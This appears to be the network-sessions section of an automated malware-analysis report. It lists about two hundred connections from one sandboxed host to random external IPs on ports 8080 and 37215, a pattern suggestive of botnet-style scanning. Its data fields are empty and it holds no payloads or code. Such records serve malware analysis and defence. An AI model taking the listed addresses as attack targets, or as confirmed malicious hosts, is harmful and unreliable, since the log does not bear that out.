                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9216192.168.2.233297831.166.143.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9217192.168.2.233566832.211.35.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9218192.168.2.2359178181.246.97.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9219192.168.2.2358492129.100.55.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9220192.168.2.2351276126.140.101.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9221192.168.2.234943034.90.18.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9222192.168.2.234214225.104.110.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9223192.168.2.235360882.136.137.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9224192.168.2.233745452.128.217.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9225192.168.2.23366502.78.62.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9226192.168.2.2338124155.97.40.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9227192.168.2.2353928173.74.84.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9228192.168.2.234335443.203.193.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9229192.168.2.2357422146.233.186.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9230192.168.2.234944223.220.2.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9231192.168.2.234443813.111.76.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9232192.168.2.2338106212.186.127.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9233192.168.2.2351978193.239.62.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9234192.168.2.2350756106.32.111.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9235192.168.2.2348248153.142.183.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9236192.168.2.235882299.112.78.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9237192.168.2.234685663.220.36.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9238192.168.2.233431463.59.104.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9239192.168.2.235284294.49.205.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9240192.168.2.2355182154.22.210.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9241192.168.2.2344854160.77.73.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9242192.168.2.234221096.139.181.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9243192.168.2.2350594100.7.43.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9244192.168.2.233795240.119.126.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9245192.168.2.235357634.184.9.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9246192.168.2.2348456108.150.176.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9247192.168.2.234880467.130.58.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9248192.168.2.23533485.86.161.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9249192.168.2.2354130192.225.52.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9250192.168.2.2339070116.153.246.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9251192.168.2.233395051.12.200.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9252192.168.2.2357062120.151.69.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9253192.168.2.2343472192.125.220.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9254192.168.2.233335859.186.69.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9255192.168.2.235636836.249.46.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9256192.168.2.234152058.169.155.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9257192.168.2.233375057.102.93.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9258192.168.2.2333484160.83.118.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9259192.168.2.235015849.212.41.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9260192.168.2.235948641.90.11.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9261192.168.2.2337322183.137.113.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9262192.168.2.2350746170.60.26.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9263192.168.2.233926288.32.225.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9264192.168.2.2336284156.24.101.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9265192.168.2.233345897.102.57.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9266192.168.2.2348284129.42.177.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9267192.168.2.2339284129.172.65.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9268192.168.2.233727263.26.176.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9269192.168.2.2360958162.165.91.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9270192.168.2.235842634.112.40.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9271192.168.2.2339024172.73.141.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9272192.168.2.233924842.116.71.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9273192.168.2.234929077.194.36.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9274192.168.2.2354872192.33.167.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9275192.168.2.234293617.147.83.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9276192.168.2.2360028114.162.186.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9277192.168.2.2350224217.100.50.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9278192.168.2.233583231.13.106.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9279192.168.2.2345920178.62.100.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9280192.168.2.2341906179.22.9.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9281192.168.2.2338518211.3.180.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9282192.168.2.2338358155.255.25.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9283192.168.2.235571295.132.91.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9284192.168.2.2342236221.168.37.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9285192.168.2.2355076195.201.176.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9286192.168.2.2345576138.151.240.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9287192.168.2.235339641.131.70.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9288192.168.2.2360690220.61.209.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9289192.168.2.236067297.28.112.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9290192.168.2.2342678171.40.34.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9291192.168.2.233439869.81.116.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9292192.168.2.2340186185.255.90.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9293192.168.2.2357688148.149.92.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9294192.168.2.2351710182.212.152.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9295192.168.2.2338796111.56.255.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9296192.168.2.2333822207.183.207.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9297192.168.2.233297696.129.67.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9298192.168.2.2346398159.47.77.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9299192.168.2.234216682.19.90.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9300192.168.2.2346156166.244.161.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9301192.168.2.235854660.190.237.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9302192.168.2.234322477.96.203.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9303192.168.2.2345818199.182.64.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9304192.168.2.2338050157.246.76.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9305192.168.2.2342610117.207.102.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9306192.168.2.2357102175.139.95.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9307192.168.2.23463581.117.55.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9308192.168.2.2336844210.214.80.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9309192.168.2.2353236150.230.171.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9310192.168.2.2360488115.203.77.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9311192.168.2.2342718133.115.26.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9312192.168.2.233528418.132.32.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9313192.168.2.235498276.242.25.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9314192.168.2.234002477.85.246.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9315192.168.2.234512678.237.161.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9316192.168.2.2334134157.67.30.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9317192.168.2.234473641.211.68.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9318192.168.2.2339356197.99.84.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9319192.168.2.2355262197.115.146.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9320192.168.2.2349062197.129.44.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9321192.168.2.2345128197.234.10.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9322192.168.2.2345398203.51.76.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9323192.168.2.2356292157.21.198.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9324192.168.2.236003241.213.169.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9325192.168.2.235236254.82.98.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9326192.168.2.233864041.81.193.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9327192.168.2.233604441.202.66.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9328192.168.2.2360112157.205.192.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9329192.168.2.2358320197.64.175.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9330192.168.2.234920241.141.222.24737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9331192.168.2.2344846157.195.227.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9332192.168.2.2334456105.46.63.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9333192.168.2.2341606157.230.61.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9334192.168.2.2359292197.58.180.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9335192.168.2.2341788168.117.148.21237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9336192.168.2.2349004157.223.6.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9337192.168.2.2344934197.216.60.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9338192.168.2.2341212159.167.203.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9339192.168.2.233422682.106.71.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9340192.168.2.2344732197.30.36.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9341192.168.2.2340836126.27.169.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9342192.168.2.2349098157.189.39.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9343192.168.2.2353588197.103.28.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9344192.168.2.234325441.175.160.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9345192.168.2.234240441.14.27.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9346192.168.2.234000657.243.199.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9347192.168.2.2353310157.82.163.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9348192.168.2.2349518197.237.92.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9349192.168.2.2351238157.255.12.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9350192.168.2.2353794197.116.106.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9351192.168.2.23550869.14.184.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9352192.168.2.235846241.240.249.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9353192.168.2.2348210197.1.201.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9354192.168.2.2340894150.174.106.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9355192.168.2.23417402.159.53.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9356192.168.2.2358098197.194.80.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9357192.168.2.2342032190.173.89.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9358192.168.2.2339282157.24.98.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9359192.168.2.235322440.79.196.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9360192.168.2.235431441.151.62.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9361192.168.2.2336390197.200.223.23537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9362192.168.2.2339098197.228.212.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9363192.168.2.2351378197.25.45.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9364192.168.2.235397441.104.210.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9365192.168.2.2352548197.161.49.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9366192.168.2.2337458157.86.137.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9367192.168.2.2336328157.164.56.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9368192.168.2.235822841.202.8.21237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9369192.168.2.233322098.103.5.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9370192.168.2.233527272.30.191.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9371192.168.2.235603641.162.62.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9372192.168.2.2334772157.136.215.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9373192.168.2.2355030157.143.10.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9374192.168.2.235633448.186.133.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9375192.168.2.234524441.2.252.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9376192.168.2.2333128197.107.27.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9377192.168.2.2338662197.240.35.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9378192.168.2.2352800197.187.191.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9379192.168.2.2354100157.101.206.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9380192.168.2.235657841.178.107.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9381192.168.2.2357904157.193.125.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9382192.168.2.2338076133.123.250.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9383192.168.2.2352618122.95.62.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9384192.168.2.235485241.135.15.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9385192.168.2.2351332197.241.232.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9386192.168.2.2333682197.101.242.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9387192.168.2.234244214.88.159.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9388192.168.2.234302658.240.89.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9389192.168.2.2334174157.44.49.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9390192.168.2.2339444157.155.30.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9391192.168.2.2344388157.156.157.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9392192.168.2.235410841.64.71.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9393192.168.2.2353348197.103.79.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9394192.168.2.2354652155.178.37.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9395192.168.2.234988041.66.184.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9396192.168.2.2352454131.34.202.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9397192.168.2.2358494197.86.4.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9398192.168.2.2352042197.85.71.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9399192.168.2.2342160112.8.41.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9400192.168.2.2338826157.160.44.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9401192.168.2.233353641.82.174.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9402192.168.2.235190641.246.70.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9403192.168.2.2352122118.176.14.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9404192.168.2.235172441.110.84.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9405192.168.2.2346432157.100.228.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9406192.168.2.2349424197.228.197.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9407192.168.2.2334448197.52.14.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9408192.168.2.2337790197.175.61.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9409192.168.2.2359316157.70.126.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9410192.168.2.233455041.13.136.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9411192.168.2.2357152157.177.84.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9412192.168.2.2344572197.209.54.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9413192.168.2.233433425.183.218.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9414192.168.2.2334142155.33.230.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9415192.168.2.2337914197.172.122.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9416192.168.2.2339528157.246.21.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9417192.168.2.2350456197.255.157.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9418192.168.2.2337612157.152.229.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9419192.168.2.2350244159.41.210.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9420192.168.2.2351338157.100.27.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9421192.168.2.234559241.138.97.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9422192.168.2.235878641.24.35.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9423192.168.2.2348336197.105.167.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9424192.168.2.2358650157.138.120.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9425192.168.2.233304441.60.205.9837215
                                                        TimestampBytes transferredDirectionData


